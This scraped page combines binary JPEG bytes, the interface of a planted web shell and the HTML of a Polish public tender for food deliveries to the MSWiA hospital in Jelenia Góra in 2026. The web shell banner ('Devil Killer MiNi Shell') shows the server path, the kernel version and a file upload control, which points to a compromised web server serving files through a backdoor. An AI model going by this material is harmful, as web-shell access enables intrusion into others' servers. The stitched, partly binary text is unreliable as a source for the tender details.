JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20251205/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20251205/0057897801-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawy żywności na potrzeby kuchni SP ZOZ Szpitala Specjalistycznego MSWiA w Jeleniej Górze oraz obiektu w Kowarach w 2026 roku. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Samodzielny Publiczny Zakład Opieki Zdrowotnej Szpital Specjalistyczny MSWiA w Jeleniej Górze</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 230173142</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Cieplicka 69/71</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Jelenia Góra</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">58-560</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL515 - Jeleniogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 756435700</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@szpitalmsw.net</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.szpitalmsw.net</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawy żywności na potrzeby kuchni SP ZOZ Szpitala Specjalistycznego MSWiA w Jeleniej Górze oraz obiektu w Kowarach w 2026 roku. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d8cbb7d7-4fd9-4af6-8281-e9b601dbd7c6</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00578978</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-12-05</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00142494/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Zakup i dostawy żywności na potrzeby kuchni SP ZOZ Szpitala Specjalistycznego MSWiA w Jeleniej Górze w 2026 roku</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-d8cbb7d7-4fd9-4af6-8281-e9b601dbd7c6 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl<br/>www.szpitalmsw.net</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Komunikacja pomiędzy Zamawiającym a Wykonawcami (składanie oświadczeń, dokumentów, zawiadomień oraz przekazywanie informacji) odbywa się elektronicznie, przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl<br/>1) We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem ogłoszenia w BZP lub Identyfikator Postępowania z Platformy zakupowej.<br/>2) Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub<br/>konkursie (zw. dalej &#34;Rozporządzeniem w sprawie wymagań dla dokumentów elektronicznych&#34;).<br/>3) Dokumenty elektroniczne, o których mowa w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych, sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, z uwzględnieniem rodzaju przekazywanych danych i przekazuje się jako załączniki. W przypadku formatów, o których mowa w art. 66 ust. 1 ustawy Pzp, ww. regulacje nie będą miały bezpośredniego zastosowania.<br/>4) Informacje, oświadczenia lub dokumenty, inne niż wymienione w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych, przekazywane w postępowaniu sporządza się w postaci elektronicznej:<br/>- w formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności (i przekazuje się jako załącznik), lub<br/>- jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej (np. w treści wiadomości e-mail lub w treści &#34;Formularza do komunikacji&#34;).<br/>5) Komunikacja w postępowaniu, z wyłączeniem składania ofert odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce &#34;Formularze&#34; (&#34;Formularze do komunikacji&#34;). Za pośrednictwem Formularzy do komunikacji odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk &#34;dodaj załącznik&#34;).<br/>6) W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację wykonawcy i Zamawiającego za pośrednictwem Platformy e-Zamówienia, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail określony w pkt. 8.2 niniejszej Specyfikacji (nie dotyczy składania ofert).<br/>7) Forma złożenia oferty - zgodnie z pkt. XI.1 niniejszej SWZ .</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1) Zamawiający informuję, że dane osobowe pozyskane w związku z przeprowadzeniem niniejszego postępowania przetwarzane będą na podstawie art. 6 ust. 1 lit. c Rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej &#34;Rozporządzenie RODO&#34; w celu związanym z postępowaniem o udzielenie zamówienia publicznego<br/>2) Administratorem danych osobowych jest Zamawiający. Podstawą prawną przetwarzania danych osobowych stanowi ustawa Prawo zamówień publicznych wydane na jej podstawie akty wykonawcze, a także ustawa o narodowym zasobie archiwalnym i archiwach. 3) Dane osobowe będą przetwarzane, z uwzględnieniem przepisów prawa, w celu:<br/>a) przeprowadzenie postępowania o udzielenie zamówienia publicznego,<br/>b) zawarcia i realizacji umowy z wyłonionym w niniejszym postępowaniu wykonawcą,<br/>c) dokonania rozliczenia i płatności związanych z realizacją umowy,<br/>d) przeprowadzenie ewentualnych postępowań kontrolnych i / lub audytu przez komórki Zamawiającego i inne uprawnione podmioty,<br/>e) udostępnienie dokumentacji postępowania i zawartej umowy jako informacji publicznej,<br/>f) archiwizacji postępowania.<br/>4) Dane osobowe będą ujawniane wykonawcom oraz wszystkim zainteresowanym.<br/>5) Dane osobowe będą przechowywane przez okres obowiązywania umowy a następnie przez okres co najmniej 5 lat zgodnie z przepisami dotyczącymi archiwizacji. Dotyczy to wszystkich uczestników postępowania.<br/>6) Osobie, której dane dotyczą przysługuje na warunkach określonych w przepisach Rozporządzenia RODO:<br/>a) prawo dostępu do danych (art. 15),</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">7/2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">7</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na kilka części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.12.) Maksymalna liczba części, jaka może zostać udzielona jednemu wykonawcy: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Mięso wieprzowe, wołowe i drobiowe, wędliny drobiowe i wieprzowe.<br/> Nazwa surowca	Jm	Ilość<br/>1	Baleron drobiowy do 10 g tłuszczu na 100 g produktu	kg.	300<br/>2	Baleron drobiowy do 10 g tłuszczu na 100 g produktu ( bez : glutenu, mleka, białka mleka, białka jaj, laktozy)	kg.	50<br/>3	Boczek wędzony	kg.	100<br/>4	Filet z indyka bez chrząstek i skóry kg.	600<br/>5	Filet z indyka pieczony 5 g tłuszczu na 100 g produktu	kg.	200<br/>6	Filet z indyka pieczony 5 g tłuszczu na 100 g produktu ( bez: glutenu,mleka, białka mleka,białka jaj,laktozy)	kg.	50<br/>7	Filet z kurczaka bez chrząstek i skóry kg.	1300<br/>8	Flaki wołowe blanszowane (bez rosołu, wywaru) kg.	300<br/>9	Golonka z indyka (waga szt. do 250g) kg.	300<br/>10	Indyk w galarecie 5 g tłuszczu na 100 g produktu	kg.	150<br/>11	Kabanos drobiowy chudy ( z piersi indyka, kurczaka ,bez skóry) na naturalnym flaku	kg.	150<br/>12	Kaszanka do 30 g tłuszczu na 100 g produktu	kg.	200<br/>13	Kiełbasa biała parzona do 25 g tłuszczu na 100 g produktu	kg.	250<br/>14	Kiełbasa krakowska drobiowa pieczona 7 g tłuszczu na 100g produktu	kg.	250<br/>15	Kiełbasa krakowska drobiowa pieczona 7 g tłuszczu na 100g produktu ( bez: glutenu, mleka, białka mleka,białka jaj, laktozy)	kg.	50<br/>16	Kiełbasa swojska do 20 g tłuszczu na 100 g produktu	kg.	200<br/>17	Kiełbasa szynkowa wieprzowa 10-15 g tłuszczu na 100 g produktu	kg.	150<br/>18	Kiełbasa śląska 15-20 g tłuszczu na 100 g produktu	kg.	150<br/>19	Kiełbasa z piersi kurczaka 3-5 g tłuszczu na 100 g produktu	kg.	250<br/>20	Kiełbasa z piersi kurczaka 3-5 g tłuszczu na 100 g produktu( bez: glutenu,mleka, białka mleka,białka jaj,laktozy)	kg.	50<br/>21	Kurczak świeży schłodzony	kg.	400<br/>22	Mięso karczek b/k	kg.	400<br/>23	Mięso łopatka wieprzowa b/k kg.	1200<br/>24	Mięso mielone wołowo -wieprzowe bez chrząstek	kg.	50<br/>25	Mięso schab b/k kg.	1200<br/>26	Mięso szynka b/k kg.	900<br/>27	Mięso z indyka udziec kg.	30<br/>28	Parówki z szynki 6-10 g tłuszczu na 100 g produktu	kg.	250<br/>29	Parówki z szynki 6-10 g tłuszczu na 100 g produktu( bez: glutenu, mleka, białka mleka, białka jaj, laktozy)	kg.	100<br/>30	Pasztet drobiowy zwykły w puszce 18-25 g tłuszczu na 100 g produktu	szt.	1000<br/>31	Pasztet pieczony drobiowy z piersi kurczaka 5-10 g tłuszczu na 100 g produktu	kg.	80<br/>32	Pieczeń drobiowa 2-5 g tłuszczu na 100g produktu	kg.	300<br/>33	Pieczeń drobiowa 2-5 g tłuszczu na 100g produktu( bez: glutenu, mleka, białka mleka, białka jaj, laktozy)	kg.	100<br/>34	Pierś pieczona 1-3 g tłuszczu na 100 produktu	kg.	350<br/>35	Pierś pieczona 1-3 g tłuszczu na 100 produktu( bez: glutenu, mleka, białka mleka, białka jaj, laktozy)	kg.	100<br/>36	Pierś z kurczaka gotowana 1-3 g tłuszczu na 100 g produktu	kg.	250<br/>37	Pierś z kurczaka gotowana 1-3 g tłuszczu na 100 g produktu( bez: glutenu, mleka, białka mleka, białka jaj, laktozy)	kg.	50<br/>38	Polędwica drobiowa z piersi z indyka 2-5 g tłuszczu na 100 g produktu	kg.	350<br/>39	Polędwica drobiowa z piersi z indyka 2-5 g tłuszczu na 100 g produktu( bez glutenu białka mleka,białka jaj,laktozy)	kg.	50<br/>40	Polędwica drobiowa z piersi z kurczaka 2-5 g tłuszczu na 100 g produktu	kg.	370<br/>41	Polędwica drobiowa z piersi z kurczaka 2-5 g tłuszczu na 100 g produktu( bez: glutenu, mleka, białka mleka, białka jaj, laktozy)	kg.	50<br/>42	Polędwica sopocka 3-5 g tłuszczu na 100 g produktu	kg.	350<br/>43	Polędwica sopocka 3-5 g tłuszczu na 100 g produktu( bez: glutenu, mleka, białka mleka, białka jaj, laktozy)	kg.	50<br/>44	Polędwica wiśniowa 5-10 g tłuszczu na 100 g produktu	kg.	100<br/>45	Polędwica z indyka wędzona 2-3 g tłuszczu na 100 g produktu	kg.	300<br/>46	Polędwica z indyka wędzona 2-3 g tłuszczu na 100 g produktu( bez: glutenu, mleka, białka mleka, białka jaj, laktozy)	kg.	50<br/>47	Polędwica z majerankiem 6-10 g tłuszczu na 100 g produktu	kg.	150<br/>48	Rolada drobiowa szpinakowa 5-10 g tłuszczu na 100 g produktu	kg.	120<br/>49	Rolada z indyka do 5 g tłuszczu na 100 g produktu	kg.	200<br/>50	Rolada z kurczaka 2-4 g tłuszczu na 100g produktu	kg.	200<br/>51	Schab pieczony do 10 g tłuszczu na 100 g produktu	kg.	250<br/>52	Szyneczka mielonka 110g kubek ręcznie otwierana	szt.	1100<br/>53	Szynka drobiowa 2-4 g tłuszczu na 100 g produktu	kg.	100<br/>54	Szynka drobiowa gotowana do 7 g tłuszczu na 100 g produktu	kg.	200<br/>55	Szynka drobiowa konserwowa do 12 g tłuszczu na 100 g produktu	kg.	200<br/>56	Szynka konserwowa z indyka 3-4 g tłuszczu na 100g produktu	kg.	100<br/>57	Szynka wieprzowa gotowana 3-5 g tłuszczu na 100 g produktu	kg.	100<br/>58	Szynka wieprzowa konserwowa do 12 g tłuszczu na 100 g produktu	kg.	250<br/>59	Szynka z indyka 2-4 g tłuszczu na 100 g produktu	kg.	150<br/>60	udka drobiowe- średniej wielkości( do 250g) kg.	2800<br/>61	Wątróbka drobiowa	kg.	200<br/>62	Wołowe pieczeniowe extra (zrazowe) kg.	300<br/>63	Żeberka paski kg.	350<br/>Szczegółowy wykaz asortymentowy stanowiący opis przedmiotu zamówienia określa załącznik nr 1a do specyfikacji warunków zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15100000-9 - Produkty zwierzęce, mięso i produkty mięsne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2026-01-01 do 2026-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryteria oceny ofert - zamawiający uzna oferty za spełniające wymagania i przyjmie do szczegółowego rozpatrywania, jeżeli:<br/>1.	oferta, spełnia wymagania określone niniejszą specyfikacją,<br/>2.	oferta została złożona, w określonym przez zamawiającego terminie,<br/>3.	wykonawca przedstawił ofertę zgodną co do treści z wymaganiami zamawiającego.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pieczywo, świeże wyroby piekarskie i ciastkarskie.<br/> Nazwa artykułu	Jm	Ilość<br/>1	Bułka grahamka bez dodatku substancji słodzących	szt.	1300<br/>2	Bułka pszenna	szt.	1500<br/>3	Bułka tarta	kg	350<br/>4	Chleb bezglutenowy	szt.	500<br/>5	Chleb biały niskobiałkowy	szt.	40<br/>6	Chleb dietetyczny 0% jaj	szt.	40<br/>7	Chleb graham bez dodatku substancji słodzących	szt.	300<br/>8	Chleb o niskim IG	szt.	400<br/>9	Chleb orkiszowy razowy bez dodatku substancji słodzących	szt.	100<br/>10	Chleb pszenno-żytni bez dodatku substancji słodzących	szt.	200<br/>11	Chleb pszenny bez dodatku substancji słodzących	szt.	2000<br/>12	Chleb z dodatkiem otrąb i ziaren bez dodatku substancji słodzących	szt.	250<br/>13	Chleb zwykły na zakwasie	szt.	10000<br/>14	Chleb żytni razowy bez dodatku substancji słodzących	szt.	17000<br/>15	Chleb żytni razowy na zakwasie (typ 2000) (skład: mąka żytnia razowa,woda,sól,zakwas)	szt.	150<br/>16	Pączki z dżemem(100g)	szt.	350<br/>17	Rogal maślany bez nadzienia	szt.	400<br/>Szczegółowy wykaz asortymentowy stanowiący opis przedmiotu zamówienia określa załącznik nr 1b do specyfikacji warunków zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15810000-9 - Pieczywo, świeże wyroby piekarskie i ciastkarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2026-01-01 do 2026-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryteria oceny ofert - zamawiający uzna oferty za spełniające wymagania i przyjmie do szczegółowego rozpatrywania, jeżeli:<br/>1.	oferta, spełnia wymagania określone niniejszą specyfikacją,<br/>2.	oferta została złożona, w określonym przez zamawiającego terminie,<br/>3.	wykonawca przedstawił ofertę zgodną co do treści z wymaganiami zamawiającego.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Owoce cytrusowe, owoce inne niż tropikalne, owoce pestkowe, warzywa strączkowe suszone, warzywa liściaste, warzywa kapustne, kapusta kiszona, ogórek kiszony.<br/> Nazwa artykułu	Jm	Ilość<br/>1	Agrest	kg.	200<br/>2	Arbuzy	kg.	1000<br/>3	Awokado	szt.	300<br/>4	Banany żółte, zdrowe bez uszkodzeń i czarnych plam	kg.	2000<br/>5	Bataty	kg.	400<br/>6	Bazylia świeża w doniczce	szt.	50<br/>7	Borówka amerykańska	kg.	400<br/>8	Botwina świeża, nie zwiędnięta w pęczkach	pęczek	120<br/>9	Bób świeży	kg.	30<br/>10	Brokuł świeży, zielony bez uszkodzeń i zanieczyszczeń	szt.	50<br/>11	Brzoskwinie	kg.	200<br/>12	Burak czerwony młody , świeży, zdrowy, czysty bez uszkodzeń (maj, czerwiec, lipiec)	kg.	500<br/>13	Burak czerwony, świeży, zdrowy, czysty bez uszkodzeń, workowany 10 kg(pozostałe miesiące)	kg.	1300<br/>14	Cebula czerwona	kg.	400<br/>15	Cebula zdrowa, czysta, cała bez uszkodzeń i kiełków, workowana 10-15 kg	kg.	2000<br/>16	Cukinia	kg.	450<br/>17	Cykoria	szt.	500<br/>18	Cytryny	kg.	100<br/>19	Czosnek 